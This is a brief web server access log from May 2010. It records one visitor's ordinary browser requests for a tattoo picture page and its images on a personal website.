94.167.14.41 - - [06/May/2010:17:32:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.167.14.41 - - [06/May/2010:17:32:22 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.167.14.41 - - [06/May/2010:17:32:23 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.167.14.41 - - [06/May/2010:17:32:23 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
94.167.14.41 - - [06/May/2010:17:32:23 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 (.NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
